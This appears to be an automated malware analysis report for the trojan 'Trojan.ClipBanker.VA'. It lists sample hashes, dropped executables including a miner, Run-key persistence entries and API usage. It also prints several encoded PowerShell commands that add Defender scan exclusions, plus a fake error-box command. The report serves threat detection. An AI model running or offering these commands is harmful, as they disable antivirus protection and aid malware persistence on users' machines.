Trojan.ClipBanker.VA

By CagedTech in Trojans

Threat Scorecard

Popularity Rank:	6,177
Threat Level:	80 % (High)
Infected Computers:	1,460

First Seen:	September 13, 2021
Last Seen:	April 17, 2026
OS(es) Affected:	Windows

Table of Contents

Analysis Report

General information

Family Name:	Trojan.ClipBanker.VA
Signature status:	No Signature

Known Samples

MD5: d074b8105f3cfb73a4cba5c6f81b721f

SHA1: bee8f717c037f0e10636a0d2d94b3709c296a33f

SHA256: CBF012A39CCE7B310060BDF9E83EADD70D68B8F5C6372ADC780594AAD28C7E9C

File Size: 597.50 KB, 597504 bytes

MD5: db554d8112be97e51d380aa1d2e9caff

SHA1: 81cf54be83b2ee85c0f66be95c3dd4bd67eed00a

SHA256: A4709844B0F3C5AB7A1DF0CEAACAE58368950D89188E9F1BA8F62E8FF5627E93

File Size: 4.95 MB, 4948480 bytes

MD5: d319034bd1e93147a1a7fee39bd8efef

SHA1: d5db70fa0d003e302e697e22569820e98159f2cf

SHA256: 05EDACB20CFC83D970514B1737FF376BF6D22CA2137B79A83F8862371142AABA

File Size: 3.86 MB, 3856384 bytes

MD5: 3b5865192ea41263be0a78b4d8a7c795

SHA1: 946d09aeb6ad5c0fd13d4bbd24ed08623f84e413

SHA256: 1F5B18D6733E467C7D89B90CD82F4EC287423AB049617B3E1D0DDA246731CE81

File Size: 4.61 KB, 4608 bytes

MD5: 5c0250fe8ef9d9c7629613b3291bc2f7

SHA1: 114d72ed97bde1880c3108fa8c9721c262bcfb4d

SHA256: BB6C959DD42A95FD673B89017C29B0F8973257136AC7E6B67130ECD1A322BA39

File Size: 5.11 MB, 5112320 bytes

MD5: 5c50e98bd9069ebec62430fd1b950224

SHA1: d5b557f71ded2dad2b8554bb0fbfc07c686f722c

SHA256: E42D0139C1AA4E523BF19A41544B79983CA00AADC198850D000D604091EF1262

File Size: 6.91 MB, 6913024 bytes

MD5: 067966556e298017a6b9d81f5557fcc7

SHA1: 4c2f9510073e48f7a6099c585f64a74a7193c474

SHA256: 4B1A7381C6C41622D06A8CD7595D1EBB64F6DAB0A92F7FE3EB5C05A02AEFF379

File Size: 5.63 KB, 5632 bytes

MD5: 7c92dc274a841225f5365fe2b652d1bd

SHA1: c883512403289967dc36a3b42e542bb143964edf

SHA256: 866AAB0D5686C8472B7F66EAE04C9ADC65E0905AC2AD753846DC1F51CB8A3D1D

File Size: 4.97 MB, 4968960 bytes

MD5: 3952bc52ce739ce187376c7c3676890d

SHA1: f298e3fb9785b8183656c6eb234b79baba4c932e

SHA256: 314AF32AC8F51A80EC296C6385B98B271F59DC6F62B9C26BB2E6E3114A7E27C3

File Size: 2.88 MB, 2882048 bytes

MD5: 11ebdd9aca574d84df203b50d6043016

SHA1: 4d254f14113d88e10eb561761f3a174ce9d45188

SHA256: 59A9D8229077F15022FDE78FD4F85DEB678C2988E753DC2D94D0A7C2955C30D7

File Size: 3.98 MB, 3977728 bytes

MD5: 865f03a25ebd95cd7265925830637d1e

SHA1: e306986287b6c86ee57664c316fc9e4fc126724f

SHA256: 264B727825F695359C76F9557EE76583FFB2480436ECF2ADB2FA3A579103268E

File Size: 5.12 KB, 5120 bytes

MD5: 35c421bc5abe4c91fb1279199e01ee39

SHA1: 06c18196aa5893001230f899c373d65df6bd5444

SHA256: 6DCA97E2018AC963F5D52FC3B1DF44F6B7CF81EDF0A97ABB1A96A61A3A00919E

File Size: 5.12 KB, 5120 bytes

MD5: f98e07af6457d92759751cdd95696e6a

SHA1: 394fec1c983a5173289722eb14358a1eeab16255

SHA256: E319B8275B4597CC816AF066F0F80873AC9F0D95FBCED487093EECBEC9080682

File Size: 1.65 MB, 1647162 bytes

MD5: 5933a3a60f512aa73aa722a2948a4e8a

SHA1: aadb9bf5df1fd609c30394f469b829d2ad0dc937

SHA256: 49D08802E297EBA82CE35AB694B23F6EDDC346EADA6164A4357C7849155B689B

File Size: 4.61 KB, 4608 bytes

MD5: 61397890ebceb654c7825ae932317a58

SHA1: a6223691375d4683bac249b8e6ad6c6a4ec198aa

SHA256: 82A6F2F42016F287A82128267353B3FE6F45B7CD35D2EBCAFC022037732BDE5E

File Size: 274.43 KB, 274432 bytes

MD5: 20eab47b2ffb0d746224d9d3ad8befc6

SHA1: 678c8f91a930cf298a0224c6078c044300e8b04b

SHA256: C6201A44444FF8FA3BDA29301B5E8951FB7648A64B83727A177FB7505062622B

File Size: 400.90 KB, 400896 bytes

MD5: 3b75cb83a454229c6f184f4b917c5601

SHA1: b4df6adf5d379ae1325c3b53a102213ba002dfa0

SHA256: F49921EABE793A140E2CE96356F3963738BD93E1E68392066F41471E080F86BD

File Size: 3.25 MB, 3245056 bytes

MD5: 734696e908927926f0649a09ea312316

SHA1: 2c09d5bfe2fe3f427f79b1ed518a9d2d3ff888cc

SHA256: 7F4AF6A07A372348FD335C6CEBDCDABCF93B8BE95F4A148BFFA5792E532F08E4

File Size: 2.12 MB, 2124288 bytes

MD5: 6faa93d2dc8b30d5d79441748722ae23

SHA1: fec1abec1aa58c7c5d134947207d8f30888e5d3f

SHA256: 3084109427E6F69462A643AFDFD441D997DAB7252154F6BD4393B5DC558DA3C6

File Size: 4.08 MB, 4077568 bytes

MD5: b819b1472bc54945ce528dfbec15ef8c

SHA1: e344a2ff2c2872b58b05cdcb2e3a0f5e3dcb1ff7

SHA256: BA330C5A968A5C9D3059BD8F48327FD0E011AA15EA0BA5F7891C248D9B9FAF53

File Size: 670.72 KB, 670720 bytes

MD5: 5257cee793739b7aa2bebe35ef572a5c

SHA1: 9c9aaffd64aba6fc084cdb989bf87f71a3d32e37

SHA256: 1C51CE0C3EE4CFED08079E40F744EE1F961034993C2DCE5F446838C605D3CCA2

File Size: 1.18 MB, 1182720 bytes

MD5: f847cd9e0e3018581031fc5caf6f066b

SHA1: a9923f80e6189e29a6c93fe1967443e8457128f9

SHA256: 7C43382483C028D6E944A7061F2615E5650357DD87956C2265657CC5DEB790A4

File Size: 1.40 MB, 1402880 bytes

MD5: 2bcf3f62313588212933d1ad051fd282

SHA1: 0f1d6b9cb2e61c4cdf2c10ca23941c407b0b308c

SHA256: CCFBED578FC36050338134AF7A23C452DFF87C23FD3D6C64B43B39EF44265DC6

File Size: 3.03 MB, 3031040 bytes

MD5: 40a31d73942ec084e3201c8b9be17069

SHA1: 527c6f8b53de92f3af393f58021aabb78714ae89

SHA256: 6FFD1B8B7C4912B4FB0BDB1437371A1E761854092FB0C3E4934D32E9A30D9F38

File Size: 75.78 KB, 75776 bytes

Windows Portable Executable Attributes

File doesn't have "Rich" header
File doesn't have debug information
File doesn't have exports table
File doesn't have relocations information
File doesn't have resources
File doesn't have security information
File has been packed
File has TLS information
File is 32-bit executable
File is either console or GUI application

File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
File is Native application (NOT .NET application)
File is not packed
IMAGE_FILE_DLL is not set inside PE header (Executable)
IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name	Value
Company Name	XenoUI
File Description	XenoUI
File Title	XenoUI.dll
File Version	1.00 1,2,85,0
Internal Name	TJprojMain
Legal Copyright	Rizve
Original Filename	TJprojMain.exe
Product Name	Project1 Project Xeno by Rizve
Product Version	1.00 1,2,85,0

File Traits

fptable
HighEntropy
No Version Info
packed
x86

Block Information

Total Blocks:	8
Potentially Malicious Blocks:	7
Whitelisted Blocks:	1
Unknown Blocks:	0

Visual Map

x x x x x x x 0

0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

ClipBanker.VA
Dapato.AL

Files Modified

File	Attributes
\device\namedpipe\dav rpc service	Generic Read,Write Data,Write Attributes,Write extended,Append data
\device\namedpipe\pshost.134063647683626032.4408.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134063647684630716.5644.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134066643681019175.2956.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134071580881195168.3876.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134087998441205982.7828.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134098748388717683.8660.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134104082697386674.4024.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134122556483075982.508.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134145088444479320.6440.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288

\device\namedpipe\pshost.134211145868314600.3116.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\wkssvc	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\5e4d.tmp\5e6d.tmp\5e8e.bat	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_1xt0dixy.za5.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_2gdnme25.egk.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_2gy13yri.kcj.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_33j5bdjo.gsu.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_3figtrjf.p55.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_5nfly1x0.hog.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_5omayrkh.4o0.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_bkezoo24.5y2.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_bowk4wif.uah.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_eos0gqc3.slc.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_essqzfri.5l1.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_i1g1rogr.1qs.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_iasdahex.2yt.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ngnvm5z4.03g.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_p2s55xk5.ayc.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_pn3vo2mc.xbr.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_qjffutxs.1na.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_s0trlcam.fda.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_seydvbqx.aqa.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_slktxzoa.vwo.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_vcnfnh5i.iko.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_vxv1egut.0eo.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\compiler.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\file.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\immortal free1.2.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\immortal.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\imx free.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\licensevalidator\license.txt	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\licensevalidator\main.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\miner.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\painel pago.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\rayd cheat.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\refrech3.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\securyt.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\vison free.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\xenouiconfig.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\monotone.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\registry.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\smartscreen.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\subdir.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\svchost.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\system.exe	Generic Write,Read Attributes
c:\users\user\appdata\roaming\trashcrack.exe	Generic Write,Read Attributes
c:\users\user\downloads\xeno.exe	Generic Write,Read Attributes
c:\windows\vison free.exe	Generic Write,Read Attributes

Registry Modifications

Key::Value	Data	API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	塟憀䨭ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ꗓ憎䨭ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	앋磫兤ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	뮚縧冂ǜ	RegNtPreCreateKey

HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	✢繋冂ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	缊冂ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enablefiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableautofiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::enableconsoletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filetracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::consoletracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::maxfilesize		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasapi32::filedirectory	%windir%\tracing	RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enablefiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableautofiletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::enableconsoletracing		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filetracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::consoletracingmask		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::maxfilesize		RegNtPreCreateKey
HKLM\software\microsoft\tracing\rasmancs::filedirectory	%windir%\tracing	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	㣗䳦ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	蕺﯃恒ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	뮖ﰺ恒ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475	㵛ȁ獖}	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	㯟ﳾ恒ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	꾺ﴲ恒ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	㠕ﵛ恒ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	␂標ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475	鰀ȁ獖}	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	滳ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	➑翁ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	渟䤣鐿ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	붶穪큓ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::registry	C:\Users\Xcqunmbw\AppData\Roaming\Registry.exe	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\run::smartscreen	C:\Users\Xcqunmbw\AppData\Roaming\smartscreen.exe	RegNtPreCreateKey

Windows API Usage

Category	API
Process Shell Execute	CreateProcess ShellExecute WriteConsole
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAddAtomEx ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAlpcConnectPort ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreatePortSection ntdll.dll!NtAlpcCreateResourceReserve ntdll.dll!NtAlpcCreateSectionView ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcDeleteSecurityContext Show More ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcQueryInformationMessage ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtAlpcSetInformation ntdll.dll!NtApphelpCacheControl ntdll.dll!NtAssociateWaitCompletionPacket ntdll.dll!NtCancelTimer2 ntdll.dll!NtCancelWaitCompletionPacket ntdll.dll!NtClearEvent ntdll.dll!NtClose ntdll.dll!NtCompareSigningLevels ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateFile ntdll.dll!NtCreateIoCompletion ntdll.dll!NtCreateKey ntdll.dll!NtCreateMutant ntdll.dll!NtCreatePrivateNamespace ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateSymbolicLinkObject ntdll.dll!NtCreateThreadEx ntdll.dll!NtCreateTimer2 ntdll.dll!NtCreateWaitCompletionPacket ntdll.dll!NtCreateWorkerFactory ntdll.dll!NtDelayExecution ntdll.dll!NtDeviceIoControlFile ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateKey ntdll.dll!NtEnumerateValueKey ntdll.dll!NtExtendSection ntdll.dll!NtFlushProcessWriteBuffers ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtFsControlFile ntdll.dll!NtGetCachedSigningLevel ntdll.dll!NtGetCompleteWnfStateSubscription ntdll.dll!NtGetContextThread ntdll.dll!NtGetNextProcess ntdll.dll!NtLockVirtualMemory ntdll.dll!NtMapCMFModule ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenMutant ntdll.dll!NtOpenProcess ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenSymbolicLinkObject ntdll.dll!NtOpenThread ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtPowerInformation ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryDebugFilterState ntdll.dll!NtQueryDefaultLocale ntdll.dll!NtQueryDirectoryFileEx ntdll.dll!NtQueryEvent ntdll.dll!NtQueryFullAttributesFile ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationJobObject ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySymbolicLinkObject ntdll.dll!NtQuerySystemInformation ntdll.dll!NtQuerySystemInformationEx ntdll.dll!NtQueryTimerResolution ntdll.dll!NtQueryValueKey ntdll.dll!NtQueryVirtualMemory ntdll.dll!NtQueryVolumeInformationFile ntdll.dll!NtQueryWnfStateData ntdll.dll!NtQueueApcThread ntdll.dll!NtReadFile ntdll.dll!NtReadRequestData ntdll.dll!NtReadVirtualMemory ntdll.dll!NtReleaseMutant ntdll.dll!NtReleaseSemaphore 31 additional items are not displayed above.
Anti Debug	IsDebuggerPresent NtQuerySystemInformation OutputDebugString
User Data Access	GetComputerName GetComputerNameEx GetUserDefaultLocaleName GetUserName GetUserNameEx GetUserObjectInformation
Process Manipulation Evasion	NtUnmapViewOfSection
Encryption Used	BCryptOpenAlgorithmProvider
Other Suspicious	AdjustTokenPrivileges SetWindowsHookEx
Network Winsock2	WSAConnect WSASocket WSAStartup WSAttemptAutodialName
Network Winsock	closesocket freeaddrinfo getaddrinfo recv send setsockopt
Network Icmp	Icmp6SendEcho2
Network Winhttp	WinHttpOpen
Network Info Queried	GetAdaptersAddresses GetNetworkParams

Shell Command Execution


							open powershell -EncodedCommand "PAAjAHgAZwBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAcgBhACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATQBpAHMAcwBpAG4AZwAgAEQATABMACAAKABkAGIAZABnAHkAYQB0AC4AZABsAGwAKQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAeABhAG0AIwA+AA=="


							open powershell -EncodedCommand "PAAjAGoAegBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAbQBxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdwB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAeQBzACMAPgA="


							open C:\Users\Pvgviwwm\AppData\Local\Temp\Compiler.exe


							C:\Users\Wcypxflh\AppData\Local\Temp\File.exe (NULL)


							open powershell -EncodedCommand "PAAjAG0AcAB2ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAYwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZgBmACMAPgA="


									open C:\Users\Xrgzroxm\AppData\Roaming\Monotone.exe


									open C:\Users\Xrgzroxm\AppData\Local\Temp\Compiler.exe


									"C:\WINDOWS\system32\cmd" /c "\5E4D.tmp\5E6D.tmp\5E8E.bat C:\Users\Xrgzroxm\AppData\Roaming\Monotone.exe"


									C:\WINDOWS\system32\mode.com mode  80,20


									WriteConsole: Access is denied


									WriteConsole: e295a0e29590e295ace29590e295a320


									WriteConsole: Your unique sess


									WriteConsole:


									WriteConsole: 4502-29797-8010


									C:\WINDOWS\system32\PING.EXE ping  localhost


									WriteConsole: 'colorecho-vc10-


									WriteConsole:         Coded by


									WriteConsole:


									WriteConsole:    If this doesn


									WriteConsole:          Contact


									WriteConsole:           This i


									WriteConsole: 'Button' is not


									WriteConsole: 'GetInput' is no


									open C:\Users\Mryehchx\AppData\Local\Temp\PAINEL PAGO.exe


									open powershell -EncodedCommand "PAAjAGYAaABzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAYgB4ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYQBuACMAPgA="


									open C:\Users\Cmpflbeo\AppData\Local\Temp\miner.exe


									open C:\Users\Cmpflbeo\AppData\Roaming\TrashCrack.exe


